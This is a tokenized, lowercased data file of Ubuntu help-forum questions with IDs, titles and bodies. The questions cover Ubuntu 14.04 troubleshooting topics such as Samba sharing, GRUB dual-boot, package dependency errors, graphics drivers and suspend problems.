457396	samba not working in ubuntu 14.04	i am new user on ubuntu 14.04 , i have virtual box oracle ... but i cant sharea folder between ubuntu 14.04 with win 7 ( open box ) ..the error or message : el par谩metro de prueba de samba devolvi贸 el error 1 : load smb config files from /etc/samba/smb.conf rlimit_max : increasing rlimit_max ( 1024 ) to minimum windows limit ( 16384 ) warning : the `` idmap uid '' option is deprecated warning : the `` null passwords '' option is deprecated warning : the `` idmap gid '' option is deprecated processing section `` [ homes ] '' processing section `` [ netlogon ] '' processing section `` [ profiles ] '' processing section `` [ printers ] '' processing section `` [ pdf-documents ] '' processing section `` [ pdf-printer ] '' processing section `` [ test2 ] '' loaded services file ok. error : cache directory /var/cache/samba does not exist warning : you have some share names that are longer than 12 characters . these may not be accessible to some older clients . ( eg . windows9x , windowsme , and smbclient prior to samba 3.0 . )
457398	safe method to install ubuntu on mbr disk with 4 primary partitions	that 's my partitions . i 'm trying to dual boot windows 8.1 and ubuntu 14.04 , and i 've disabled secureboot , fastboot , and all that crap . i 'm trying to install it with uefi . what do i need to do in this box to install it ? are there too many partitions ? what can i do ? if you know the answer , please tell me what to do . thanks .
457400	how to make windows 8.1 first boot priorty in gnu grub menu	i have dual boot of windows 8.1 and ubuntu 12.04 . the problem is every time i turn on my netbook ubuntu will be the priority in the gnu grub menu . if i do n't select windows it will automatically boot into ubuntu ... how do i make windows first boot priority before ubuntu ?
457402	will sas or sata controller play with onboard sata controller using mdadm raid 6	i currently have a linux mdadm raid 6 setup on a supermicro server board using a total of 6 ssd drives . i would like to add more . if i buy one of the available pcie sas or sata controllers to expand my number of drives for instance , http : //www.supermicro.com/products/accessories/addon/aoc-usas2-l8i.cfm ? typ=i do i have to put all drives on the card , or will it play well with the on-board sata controller so i can some drives on each ? i am unsure what to expect when i purchase such a controller board . i do n't want to break the raid . it 's hosting websites and email at this time . what sayeth the group ? jay compumatter
457403	unable to install gcc on ubuntu 12.04 lts	i am trying to install gcc on ubuntu using : sudo apt-get install gcc i get the following error : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libaio-dev : depends : libaio1 ( = 0.3.107-7 ) but 0.3.109-2ubuntu1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i try sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libgmp10 : i386 libmpfr4 : i386 libgomp1 : i386 libquadmath0 : i386 libtinfo-dev : i386 libc6-dev : i386 linux-libc-dev : i386 libmpc2 : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libaio-dev the following packages will be upgraded : libaio-dev 1 upgraded , 0 newly installed , 0 to remove and 19 not upgraded . 1 not fully installed or removed . need to get 0 b/23.2 kb of archives . after this operation , 80.9 kb disk space will be freed . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of libaio-dev : libaio-dev depends on libaio1 ( = 0.3.107-7 ) ; however : version of libaio1 on system is 0.3.109-2ubuntu1 . dpkg : error processing libaio-dev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : libaio-dev e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can someone please help ? thanks
457406	software unavailable in 14.04 lts	lots of software that were downloadable in the previous versions of ubuntu ( like 11.10 , 12.04 lts , 13.10 ) seem not to be available in 14.04 lts . like , synapse is not available , or gnomebaker . there maybe a lot more but i have not explored further . using ubuntu without synapse is frustrating , since i have got so much used to it . so , how can i get synapse in my computer ? should i revert to my older 12.04 lts version ?
457407	when i suspend my laptop , it freezes or something	when i suspend my laptop or close the lid and then open it back up , i have a completely dark screen . i ca n't even move my pointer because it does n't even show up . the screen is as if the laptop is not even on . is there a way to fix this ? i usually have to turn my laptop off and then back on ... then i lose all of my work and its just a big hassle . is there a certain key or something to do so that i can fix this problem ? i 'm using an hp pavillion g6 laptop . it 's only like 2 or 3 years old .
457408	i 'm having a lot of trouble installing and running java	new to lubuntu . i 'm having trouble installing java . can anyone point to a 'site where i can get some clear & simple how-to ? thanks
457409	memory is not released from swap when a program is terminated	memory and swap are both near maximum . i shut down all the processes i initiated . the memory and swap are still both near maximum . is there a way to release the memory used by a terminated program ? what will happen if i turn swap off then turn it on again ( sudo swapoff -a ; sudo swapon -a ) when memory and swap are both near maximum ?
457411	xmodmap loose custom settinfs in some cases	all . i 'm remap cmd key behaviour to act like a ctrl with xmodmap . all works fine , but in some cases xmodmap loose my custom settings and return to defaults . i.e . when i 'm pressing ctrl-space ( change keyboard layout in my case ) or when i 'm focus skype chat window . any suggestion why this happens and how to avoid it ?
457413	ca n't create folders from gui even though i 'm admin/root	i 'm pretty new to ubuntu , or linux for that matter , and i 'm trying to perform the simplest activity ever , copy and paste a file ; for some reason , when i right-click the folder /usr/bin i see that the 'paste ' option is gray ( meaning i ca n't select it ) . why is that ? i 'm pretty sure i 'm the root user . i can see `` account type = administrator '' on the account 's settings .
457422	apache : access denied via http page ( local/remote )	does not work for me . this worked in prior version but does n't work now ? getting access denied . think issue is w/apache2 changes not os . can not find anything that defines documentroot yet it is defined to /var/www/ and symbolic links seem to now fail . custom .conf to other folder also fail , access denied . just to make it more confusing . every folder everywhere has been granted access to www-data the grp running apache2 .
457423	cinnamon on ubuntu 14.04 ?	any word on when cinnamon may be updated for ubuntu 14.04 ? i know it takes time , so i hope no one thinks i am being an impatient little brat , just curious . thanks all !
457424	ubuntu does n't boot after upgrading to 14.04	i have been using ubuntu since december , 2013 . as of now i am doing good with this os and getting acquainted with and slowly learning in-depth file structure , etc . however yesterday there was an automatic upgrade of my os to ubuntu 14.04 . i accepted and agreed to the upgrade . now after the upgrade has completed , my os is not booting at all . please help me to resolve this issue .
457425	libreoffice and chrome crash when showing dialog box ( insert , save , open ) ( ubuntu 14.04 )	i 'm upgrading my 12.04 to 14.04 , after that everytime i want to insert image in libreoffice , or saving pdf from chrome or opening `` customize and control '' in chrome , the software is always crashed . currently i use ldxe windows manager and there 's no problem in that . thanks for the comment lenovo u350 , 4 gb ram intel centrino 2 , dual processor @ 1.4 gb
457429	i was messing with compizconfig and now i lost the top panel	i was messing with compizconfig and i lost the top panel where it tells the time and has the exit buttons and whatnot . could someone help me get the top panel back ? thank you .
457431	unable to adjust master sound volume	i was wearing my headphone yesterday , and suddenly a thunder struck , then the headphone have no more sound . i thought it was the hardware problem , but after i reboot and it work again , however , this time , i am unable to adjust the master volume through panel shortcut with mouse , the minimum and maximum have no different at all . but i do able to mute and unmute , adjust the volume via the application , and when i use hardware keys to adjust the volume , the system sounds did change according to the setting . i am using asus a42jv ( or k42jv in some countries ) , ubuntu 14.04 . any solution to this ? thank you .
457434	virtual box doesnt shows 64 bit os in ubuntu14.04 64 bit	i installed 64 bit ubuntu 14.04 in my home pc and virtual box in it . but the real problem is v box only shows 32 bit oses . i had a same problem in 12.04 also ( and i did n't got a solution ! ) . is there any solution for that ? i really need to install 64 bit windows as a vm . i use v box version 4.3.10 .
457437	how can i add arial to the fonts used by software ?	hi people i 've used ubuntu 's software centre to add microsoft fonts ( by downloading the package ttf-mscorefonts-installer ) to ubuntu but this does n't seem to translate into the fonts being available for marvinsketch which is actually the whole reason i added these new fonts . plus it does n't seem available for libreoffice see i 'm trying to create images that satisfy these conditions and one of them is that the text in marvinsketch is in arial font . i also ca n't seem to get this font to be used for general things like headings and default text in other software like google chrome ( which i 'm trying to achieve by means of ubuntu tweak tool ) .
457440	can not boot ubuntu 14.04 alongside windows 8.1	i have an asus q200e 64 bit laptop . i was using ubuntu 13.10 ( and the older versions ) along with windows 8 and windows 8.1 for last 1 and half years . i recently updated ubuntu 13.10 to 14.04 . after updating ubuntu , it was working well and i used it for two or three days . yesterday i switched back to windows and today when i was shutting down my windows to go back to ubuntu there was an update for windows going on and i completed the update . now i can not go back to ubuntu anymore . i did not have to use any grub or anything like that to choose the operating system . i need to go to the bios settings to choose the boot options and i can choose what operating system i want to use from there . it still showing i have both of the operating systems like before but i can not switch to ubuntu anymore . i am wondering if anybody knows the solution of it . any useful help would be appreciated . thanks .
457442	creative vfo-260 webcam not working	using 14.04 lts , have an older web cam creative model vfo-260 but ca n't get it to work . when i do lsusb i get id 041e:4052 creative technology , ltd live ! cam vista im the camera does not show up in skype nor cheese . tried the rastageeks ov51x-jpeg-1.5.9 driver but ca n't get the make command to work , and not sure this file from 2008 will solve the problem . any suggestions , and i am complete linux newbie but pretty quick on the uptake . thanks .
457443	how do i use a smartcard sle4428 to log into my account instead of typing a password	sle4428 card scr3310 reader i followed the directions here http : //blog.fkraiem.org/2013/03/13/linux-smart-card-authentication-howto/ and only got `` unresponsive card '' , googled the problem and tried several suggested `` fixes '' but its still not working . can anyone help me ?
457444	how to install english edition software with apt-get ?	i am using ubuntu 13.10 , and locale is lang=zh_cn.utf-8 . when i use apt-get to install software , it automatically install chinese edition for me . how can i make it to install english edition for me ?
457445	zfs vs btrfs on trusty	i have been running precise with zfs on root for the last two years on a home file/media server and htpc . i am looking at rebuilding the server using trusty and i am wondering if i should be using btrfs instead . anyone have any personal experience to comment about one or the other ? my zfs experience overall has been positive and i have not lost any data so far . i like the nextgen fs features , snapshots , on-line scrubbing , error detection . but it , at least zfs on linux ( zol ) , feels very slow and the integration with the os ( ubuntu ) is a hack that has created a few minor headaches . with btrfs i know i wo n't get all the features of zfs but at least the important ones , i 've read the performance is better than zol and it has os integration . the final question is about btrfs ' stability and i have been hearing positive things about that .
457446	ubuntu 14.04 nvidia-prime `` is it supported ? no ''	i have an optimus laptop , a dell xps 15 l502 , which i 've had for a few years and have tried various things on ( bumblebee , nvidia-prime , linux kernel optimus support ) . the graphics card is an nvidia gt 540m . i upgraded to ubuntu 14.04 a few days ago and wanted to try nvidia-prime again ( it was n't working so great for me on 13.10 ) , but nvidia-settings only tells me that it is not supported . software and updates recognises the nvidia card and drivers . nvidia settings currently gives me this : ** message : prime : no offloading required . abort ** message : prime : is it supported ? no i 've tried to purge and reinstall nvidia drivers a dozen times , i 've tried with and without xorg.conf files , but still always the same thing . i 've followed all the guides i could find on stackoverflow , askubuntu , and various other places . i 'm happy to provide parts of certain log files if needed . i have n't been able to glean much from them ( though i 'm not exactly an expert ) . i would be glad if someone could give me any hints as to why this is not working for me while it does seem to work for so many others . edit : i was having problem with booting into `` low-graphics mode '' , but that was due to a bad lightdm configuration that broke when i upgraded . i also had some segmentation fault issues with nvidia-settings installing the wrong version of itself ( this was fixed by reinstalling just nvidia-settings ) . edit : have also found this bug report : https : //bugs.launchpad.net/ubuntu/+source/nvidia-prime/+bug/1283439
457447	does removing a partition automatically increase another ?	is it possible to format a partition and then converge it with the other partition so that the storage capacity of the other partition with the os increases ? actually , i am suffering that . i got two partitions on my hard disk . both being 232 gb . i actually wanted to know if all of 464 gb can be used with one os in one partition only by removing the os from the former partition ?
457448	not able to connect airtel datacard e 173 in lbuntu 14.04lts but is connecting in ubuntu 14.04 lts	sir airtel data card e173 ( indian service ) is working in ubuntu 14.04 lts with out any problems as the same is setup through the menu option by selecting mobile broad band connection and selecting the country/service/default service . but the same not able to connect in lubuntu 14.04 lts . confiugured through network manager from preferences menu by selecting the country/service provider/service with default settings . ethernet and wifi are connected through manual settings . request for solution / suggestions .
457452	why folder is not sharing in ubuntu 13.10 ?	i want to share my computer 's folder beyond the local network , i 've installed samaba to access folder from another computers and gives 777 permission and have change owner as well to the folder but it says `` you do not have permission to access '' while accessing form other computer ? please help me
457453	how can i get a rss/atom feed for new package releases on launchpad ?	how can i get a rss/atom feed update if a project releases a new package ? take the example of back in time . i would like to get an update for their release of “backintime” source package in sid version 1.0.34-0.1 uploaded on 2014-01-07
457459	clicking on nautilus opens new window rather than opened ones	whenever i click on nauitlus ( home ) icon with one opened window , it always opens new rather than showing me opened ones . is there any tweak for this ?
457461	gvfs-mount not working on ubuntu 14.04 for wireless hdd	in 12.04 , i would mount a wireless hdd ( windows share ? ) using the following command gvfs-mount smb : //10.0.0.17/public then ~/.gvfs will contain the mount . in 14.04 , when i do this . the command does n't give any error message but 1 ) i get permission denied when i try to access ~/.gvfs and 2 ) it is empty . what is the best way to do this ? thanks
457465	when will flash player 11.2.202.356 security update will be available	adobe systems released emergency security updates for flash player in order to fix a vulnerability that has been exploited in attacks against users since earlier this month . software center provides 11.2.202.350 version , when will they update , considering it is a critical security update . adobe statement
457468	pass value of variabe to the another command	i have following command : usb_soundcard_sink= $ ( pactl list short sinks | grep `` alsa_output '' | awk ' { print $ 2 } ' | tail -n1 ) it find the sinks name : sink_index= $ ( pactl list short sinks | awk -v index_number= $ usb_soundcard_sink ' $ 2==index_number { print $ 1 } ' ) it find the index number of given sinks i.e $ usb_soundcard_sink now in the following command i want to pass the $ sink_index as parameter . i tried in the following command : volume= $ ( pactl list sinks | perl -000ne 'if ( / # $ sink_index/ ) { / ( volume : . * ) / ; print `` $ 1\n '' } ' | sed 's/ . *\ \ ( .*\ ) % . */\1/g ' ) but it is not accepted $ sink_index as parameter . so how can i pass the value of sink_index variable to that command ?
457469	where can i specify init service conf for isc-dhcp-server ?	i used service isc-dhcp-server start to invoke the dhcpd . if i do ps -ef | grep dhcp here it is : root @ casalab-latitude-d530 : ~ # ps -ef | grep dhcp dhcpd 6636 1 0 apr28 ? 00:00:00 dhcpd dhcpd 6640 1 0 apr28 ? 00:00:00 dhcpd dhcpd 6814 1 0 apr28 ? 00:00:00 /usr/sbin/dhcpd -f -q -4 -pf /run/dhcp-server/dhcpd.pid -cf /etc/dhcp/dhcpd.conf where can i specify the server parameter and dhcp.conf file if i do it this way ?
457473	ubuntu 14.04 : where did my grub go ?	i have an asus q200e 64-bit laptop . i was using ubuntu 13.10 ( and the older versions earlier ) along with windows 8 and windows 8.1 for the last 1â˝ years . i recently upgraded ubuntu 13.10 to 14.04 . after upgrading ubuntu it was working well , and i used it for two or three days . yesterday i switched back to windows and today when i was shutting down my windows to go back to ubuntu there was an update for windows going on and i completed the update . now i can not go back to ubuntu anymore . usually i need to go to the bios settings to choose the boot options where i have two options for ubuntu and one option for windows . if i choose either of those ubuntu options the grub runs and i can login to ubuntu . now it still showing i have both of the operating systems like before , but it does not go to the grub although windows is running properly . i did not find any uefi or anything like that , and i know that if i remove my current ubuntu and if i freshly install another ubuntu , it will fix the problem , but i do n't want to do that . i am wondering if anybody knows a smarter solution for it . any useful help would be appreciated . thanks .
457476	ibus methods do not show up in text entry settings	i installed both korean and japanese using the language support window , and expected korean ( hangul ) and japanese ( anthy ) to show up in the input sources for text entry settings ( having both packages installed ) . however , neither shows up .
457478	compiz - move window controls to the right	i was wondering how i could move my window controls ( close , minimize , maximize ) to the right instead of the left . i have ubuntu 14.04 with xfce and compiz . thanks !
457480	can i use gdebi for mutiple packages or any alternative ?	i installs packages by dpkg -i *.deb but it can not install missing dependencies and errors if any dependencies not satisfied . so , we have to run apt-get -f install after dpkg -i *.deb for fixing broken packages . gdebi can downloads dependencies before installing if any missing while sudo gdebi [ deb archive ] . but sudo gdebi *.deb is not available to run via command-line . so , how to solve or is there any another method ( alternative ) to do that ? ultimately i want to install missing dependencies ( if any ) before dpkg -i *.deb . thus , is there any solution that checks all dependencies where all debs are exist ( all deb 's are in one directory ) and then installs only missing packages that not included in mentioned directory ? do n't suggest command to list all dependencies because i want to install only missing that not included in mentioned directory ( where all debs exist ) . give me any alternative command or method or appropriate use of command ( s ) ( should be used by piping or co-operating each-other ex : gdebi+apt+dpkg )
457483	dvd drive is not mounting any cd , dvd or games	i ca n't get any dvds to work , but i can boot from a cd . justin @ justin-x6815 : ~ $ wodim -- prcap dev=/dev/sr0 wodim : operation not permitted . warning : can not raise rlimit_memlock limits . device type : removable cd-rom version : 5 response format : 2 capabilities : vendor_info : 'tsstcorp' identification : 'cddvdw sn-208bb ' revision : 'sb00' device seems to be : generic mmc2 dvd-r/dvd-rw . drive capabilities , per mmc-3 page 2a : does read cd-r media does write cd-r media does read cd-rw media does write cd-rw media does read dvd-rom media does read dvd-r media does write dvd-r media does read dvd-ram media does write dvd-ram media does support test writing does read mode 2 form 1 blocks does read mode 2 form 2 blocks does read digital audio blocks does restart non-streamed digital audio reads accurately does support buffer-underrun-free recording does read multi-session cds does read fixed-packet cd media using method 2 does not read cd bar code does read r-w subcode information does not return r-w subcode de-interleaved and error-corrected does read raw p-w subcode data from lead in does return cd media catalog number does return cd isrc information does support c2 error pointers does not deliver composite a/v data does play audio cds number of volume control levels : 256 does support individual volume control setting for each channel does support independent mute setting for each channel does not support digital output on port 1 does not support digital output on port 2 loading mechanism type : tray does support ejection of cd via start/stop command does not lock media on power up via prevent jumper does allow media to be locked in the drive via prevent/allow command is not currently in a media-locked state does not support changing side of disk does not have load-empty-slot-in-changer feature does not support individual disk present feature maximum read speed : 33240 kb/s ( cd 188x , dvd 24x ) current read speed : 33240 kb/s ( cd 188x , dvd 24x ) maximum write speed : 33240 kb/s ( cd 188x , dvd 24x ) current write speed : 33240 kb/s ( cd 188x , dvd 24x ) rotational control selected : clv/pcav buffer size in kb : 1024 copy management revision supported : 1 number of supported write speeds : 1 write speed # 0 : 2770 kb/s clv/pcav ( cd 15x , dvd 2x ) supported cd-rw media types according to mmc-4 feature 0x37 : does write multi speed cd-rw media does write high speed cd-rw media does write ultra high speed cd-rw media does write ultra high speed+ cd-rw media
457484	thinkpad x220 not waking from suspend after upgrading to xubuntu 14.04 from 13.10	i upgraded my xubuntu 13.10 install to 14.04 yesterday , everything seems to be working fine or eve better than before except suspend . when i shut the laptop lid xubuntu suspends as it should . then when i open the lid gain i am prompted for my password , after i enter it the screen just goes blank again with the suspend light blinking . does anybody have any suggestions as to what could be causing this . cheers jim
457485	getting help on eee pc 1001 ha	i have a five year old netbook , eee pc 1001 ha ( bought in february 2010 ) , and recently there was some news that microsoft has stopped supporting window xp . can i switch over to ubuntu ? i have worked out it and liked it . can you tell me which version of ubuntu would be good ? and as it does not have a cd drive , can i use pendrive instead ?
457486	what does the `` a '' on customize and control chromium icon mean ?	after upgrading to 14.04 i see a blue lowercase `` a '' over the `` customize and control chromium '' icon that i 've never seen before . what does it mean ?
457487	gimp installation failed due to depedency	i want to install gimp in 13.10 . i follow these procedure to install gimp . sudo add-apt-repository ppa : otto-kesselgulasch/gimp-edge sudo apt-get update sudo apt-get install gimp but after i update the system , when i go for the last command . ( sudo apt-get install gimp ) it show this error the following packages have unmet dependencies : gimp : depends : libgimp2.0 ( > = 2.9.1.119-build~33915~145295a~saucy0~ppa ) but it is not going to be installed depends : libgimp2.0 ( < = 2.9.1.119-z ) but it is not going to be installed depends : libgegl-0.3-0 but it is not going to be installed e : unable to correct problems , you have held broken packages . how can i install the gimp and resolve the error . please help me .
457488	will unity performance ever improve on older hardware ?	despite tweaking , unity only runs 'acceptably ' on my mid-to-lowendish laptop , despite being advertised otherwise . are there improvements planned or am i better off getting used to xfce/lxde right now ?
457489	brother hl-2240d printer printing off center after upgrading to ubuntu 14.10	i 've just upgraded from ubuntu 13.10 to 14.04 . i connected my brother hl-2240d laser printer which had been running successfully under 13.10 . however , everything now prints off centre . this particular printer is not automatically installed by ubuntu . i had to manually install the linux lpr driver and cupswrapper driver from the brother website . i followed exactly the same procedure as when installing on ubuntu 13.10 , and used the same drivers . this was done through the terminal using : sudo dpkg -i -- force-all followed by the lpr and cupswrapper drivers . any ideas ?
457492	upgraded ubuntu from 13 to 14.03 ; x11 through ssh is not working	how to enable x11 forwarding in ssh config or sshd config with respect to ubuntu 14.03 following is the error : putty x11 proxy : mit-magic-cookie-1 data did not match/usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:57 : gtkwarning : could not open display warnings.warn ( str ( e ) , _gtk.warning ) /usr/bin/meld:155 : gtkwarning : ia__gtk_icon_theme_get_for_screen : assertion 'gdk_is_screen ( screen ) ' failed gtk.icon_theme_get_default ( ) .append_search_path ( meld.paths.icon_dir ( ) ) traceback ( most recent call last ) : file `` /usr/bin/meld '' , line 155 , in < module > gtk.icon_theme_get_default ( ) .append_search_path ( meld.paths.icon_dir ( ) ) attributeerror : 'nonetype ' object has no attribute 'append_search_path' the same work when i execute the command in ubuntu , i could meld opens the windows and showing the diff , but through x11 i get this error
457494	server gets restarted while installing ubuntu	i 'm using fujitsu primergy rx200 s8 server , when i installing ubuntu 13.10 server edition the server gets restarted itself at the time of `` installing the system '' after partitioning step . the media installing pre required file at this stage , on the completion of 83 % the package `` preparing linux-image-extra-3.11.0-12-generic '' try to install but its failed and the server gets restarted . what is the issue ?
457496	cpu fan not working in acer gateway ne56r	my laptop fan was not running in ubuntu 14.04 and hence it become heated up easily . kindly help to get a solution for to get my laptop fan running . in windows i never had these kind of issues
457498	problems with drivers for ati radeon 4500 after upgraded to 14.04	i upgraded to 14.04 and have managed to break by graphics drivers . i 'm not even sure where i 'm at now . i have a dell studio 15 with a ati radeon 4500 video card . i know this is no longer supported by the latest proprietary drivers , so if i 'm not mistaken i can just use the default xserver drivers ( xserver-xorg-video-radeon ) ? ? after my system upgrade i was able to login , but only when using the recovery option from my grub menu ( and just selecting the first option to continue to start up ) . i only had low resolutions available to me ( up to 1024 instead of 1366 ) and everything was very slow . so i tried installing different drivers , and even tried the ubuntu-amd-catalyst-install from http : //www.thefanclub.co.za/how-to/ubuntu-amd-catalyst-install , but that made things worse and has destroyed x for me . how can i recover from this , and get things running nicely again ? i 've tried to reinstall xserver-xorg-video-radeon but it fails with a dependency problem ( xorg-video-abi-15 , which is part of xserver-xorg-core ) . i try to install xserver-xorg-core and it tells me `` reinstallation of xserver-xorg-core is not possible , it can not be downloaded ''
457501	upgrade from 13.10 to 14.04 no unity dash for default user special compiz config	i 've upgraded my ubuntu from 13.10 to 14.04 using the ubuntu suggested option , everything went well -- meaning no report of corrupted update or anything - but when i rebooted and logged in again there was no desktop , meaning all i was getting was a black screen and the mouse pointer . i looked through the other threads on here and tried the solutions on there , it did n't really worked . all i 've been able to do was after removing and re-installing the lightdm manager i was able to get the top bar in the logging screen , but after actually logging in with the default user i only get a top bar with file wiew help etc and i ca n't open a terminal using ctrl+alt+t . i had some special compiz configuration in 13.10 , but i 've removed it and the problem is still not solved . another thing , if i log in with a guest user i get both the top and side bar in ubuntu . if you guys have any idea what i could do it would be appreciated . l.e . thanks for your input but none of them helped sadly . dpn i tried to do what you suggested and i could n't run the first command , i got the following error : `` error : can not autolaunch d-bus without x11 $ display '' and , daniel your solution did n't change anything at all , i already had that files in the place with configured exactly as you suggested . is there a way for me to copy the settings from the guest account in the default account ? or a way to compare the 2 configurations and see what 's different ? thanks , any advice would be appreciated ! l.l.e . i fixed it , i do n't know if it helps anyone but , what i did was to reinstall the compiz-core : sudo apt-get install -- reinstall compiz-core and then to remove the files in the .cache and .config folders sudo rm -rf ~/.config/dconf/user sudo rm -rf ~/.cache/compizconfig-1 hope this helps others ! thanks for the support !
457505	ubuntu 12.10 wo n't boot : firewall : in=wlan0 out= mac= ... src= ... dst= ... len=68 tos=0x00 prec=0x00	my 12.10 wo n't boot up suddenly . and it just stucks at the following screens : i 've tried googling `` ubuntu 12.10 boot stuck at firewall ... '' , but had no luck ( most of the results are not relevant ) . any thoughts or ideas ? recently upgraded from 12.04 to 12.10 . and it 's been running smoothly until this happened . desktop environment was cinnamon . kernel is 3.5.0-47-generic ubuntu built : 12.10 machine detail : thinkpad w520 , intel i7 , 10gb ram , 500gb hdd , nvidia gl106glm q2000m , intel ultimate-n 6300 network controller
457506	eclipse ( adt ) crash failed to write core dump . core dumps have been disabled	i found my problem here : how to fix âfailed to write core dump . core dumps have been disabledâ error while running java and here : eclipse crashing on startup and here : eclipse continue crash nothing help me ; this is the problem : # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007fa434ffc2a1 , pid=6989 , tid=140346763503360 # # jre version : java ( tm ) se runtime environment ( 7.0_55-b13 ) ( build 1.7.0_55-b13 ) # java vm : java hotspot ( tm ) 64-bit server vm ( 24.55-b03 mixed mode linux-amd64 compressed oops ) # problematic frame : # c [ libsoup-2.4.so.1+0x6c2a1 ] soup_session_feature_detach+0x11 # # failed to write core dump . core dumps have been disabled . to enable core dumping , try `` ulimit -c unlimited '' before starting java again # # if you would like to submit a bug report , please visit : # http : //bugreport.sun.com/bugreport/crash.jsp # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . i did this : to enable core dumping , try `` ulimit -c unlimited '' before starting java again and also not help ; i tried to upgrade , but i had dependency problems . in the last few days i tried to install cisco packet tracer , this mean i install and uninstall some stuff ( like ia386 - something - i dont remember the package name ) . if i cant fix this , i thinking to do a fresh installation of adt or over to intellij . to do a fresh installation ( how i should backup all my plugins ? )
457509	how do i set my startup applications ?	i 've looked through old questions like where did the startup-applications-preferences program go ? but it did n't help me as i searched the software centre for gnome-session-properties and did n't find anything .
457510	problems with broadcom wireless driver	i installed ubuntu but having issues with printer & wireless lan drivers to start with . luckily i have windows 7 dual boot but can not use ubuntu unless internet problem is sorted out . can someone guide .
457513	what happened to with the alternate installer in ubuntu 14.04 ?	http : //releases.ubuntu.com/12.04/ vs. : http : //releases.ubuntu.com/14.04/ in the `` old '' times ubuntu had a separated `` ncurses-based '' installer when people wanted to use full disc encryption when installing . it was named : alternate installer . question : what happened to the alternate install cd ? are there any
457519	since upgrade to trusty , mobile broadband card always asks for pin	i 'm running ubuntu on my thinkpad x230 equipped with a mobile broadband card : bus 003 device 025 : id 0bdb:1926 ericsson business mobile networks bv this used to work seamlessly in ubuntu 13.10 ( and previous ones ) . after upgrading to trusty , upon login , after resume i always get a dialog asking for the pin of the sim card . marking `` remember pin '' while answering does n't help - the same dialog appears again upon next login or resume . any hints how to get rid of that dialog and remember the pin ? i 'm aware that i can switch off pin usage on the sim itself , but i 'd prefer a solution where the pin is remembered . addendum based on comments below i have a broandband connection configured containing the pin as well . the connection works perfectly fine . the issue is that the pin dialog pops up upon login and resume even if wwan connection is not activated . default connection is ethernet or wifi . as a side information : i 'm using tlp - but i doubt that this is related to the issue . the requested screenshot :
457520	how do i restore missing duty , run , period and polarity on beaglebone black in bone_capemgr.9 ( ocp.2/pwm_test_p8_13. # ) ?	i just a fresher did the servo test with my beaglebone black ( bbb herein ) , however , when i use some commands from this tutorial i have some serious problem with my pwm setting . ubuntu @ ubuntu-ianymu : /sys/devices/ocp.2/pwm_test_p8_13.14 $ ls modalias power subsystem uevent i consider there are missing some file with my bbb . it should includes run , duty , period , polarity . so i try to use update it does not work , and use sudo sh -c `` echo am33xx_pwm > /sys/devices/bone_capemgr.9/slots '' sudo sh -c `` echo bone_pwm_p8_13 > /sys/devices/bone_capemgr.9/slots '' neither worked . guys , i have already asked many ask forum about this question , no one know how to fix that . somebody suggested i change to debian or angstrom . so , here is some information about my bbb and environment . ubuntu @ ubuntu-ianymu : ~ $ uname -a linux ubuntu-ianymu 3.8.13-bone20 # 1 smp wed may 29 10:49:26 utc 2013 armv7l armv7l armv7l gnu/linux root @ ubuntu-ianymu : /sys/kernel/debug # cat /sys/kernel/debug/pwm platform/48304100.ecap , 1 pwm device pwm-0 ( ( null ) ) : platform/48304200.ehrpwm , 2 pwm devices pwm-0 ( ( null ) ) : pwm-1 ( ( null ) ) : platform/48302200.ehrpwm , 2 pwm devices pwm-0 ( ( null ) ) : pwm-1 ( ( null ) ) : platform/48300100.ecap , 1 pwm device pwm-0 ( ( null ) ) : platform/48300200.ehrpwm , 2 pwm devices pwm-0 ( ( null ) ) : pwm-1 ( ( null ) ) :
457522	bash script does n't execute command from path	i have this simple script : # ! /bin/bash echo $ { hadoop_home } $ ( hadoop fs -ls ) the output is : /opt/hadoop-0.20.2-cdh3u2 ./hello.sh : line 3 : found : command not found so bash definitely sees hadoop_home . i 've set it in ~/.profile and added path to bin folder : export hadoop_home= '' /opt/hadoop-0.20.2-cdh3u2 '' export path= $ path : $ hadoop_home/bin if i simply invoke command in console everything works but inside a script it does n't . what am i doing wrong ?
457525	ubuntu 14.4 : add links to places in menu	i would like to add custom links to the places window on the top of the left pane in every nautilus window . i found solutions that suggest to just drag and drop it over the left pane , but that does not work with my ubuntu 14.4 . does anybody know how it works here ? best regards , peter
457526	how to install cpuminer in ubuntu	i am trying to install cpuminer according to this tutorial . tutorial describes installing cpu miner using termial . sudo apt-get install libcurl4-openssl-dev libncurses5-dev pkg-config automake yasm # clone cpuminer git clone https : //github.com/pooler/cpuminer.git # compile cd cpuminer ./autogen.sh ./configure cflags= '' -o3 '' make # choose a miner pool and register there # start the miner ./minerd -- url=your.minerpool.org -- user=username -- pass=password i have installed git and downloaded cpuminer from git . but when tried to compile it its showing this error user @ user-dell-notebook-pc : ~ $ cd cpuminer user @ user-dell-notebook-pc : ~/cpuminer $ ./autogen.sh ./autogen.sh : 8 : ./autogen.sh : aclocal : not found user @ user-dell-notebook-pc : ~/cpuminer $ i am new to ubuntu and mining and advance thanks for your help
457528	how do i create an efi-bootable iso of a customized version of ubuntu ?	i have created an own ubuntu distribution that i want to boot ( from a usb ) on my mac . when using the standard 64bit-ubuntu-iso from the ubuntu website , it boots . however , when doing the exact same thing with the iso file containing my own distribution it does not work , and it appears to only support legacy boot . however , the os has the /sys/firmware/efi folder , so i know it supports efi . i made the iso using relinux . i have looked at the differences between the two iso files , and have seen that the standard ubuntu has an efi/boot folder containing grubx64.efi and bootx64.efi , and also has a boot folder which does n't exist in the other . i have tried to copy these two directories , the efi and boot folder into my other usb , but does n't work . my question is : how can i get these two folders into my current iso file ? and how can i make an iso of my distribution so that it supports efi boot ?
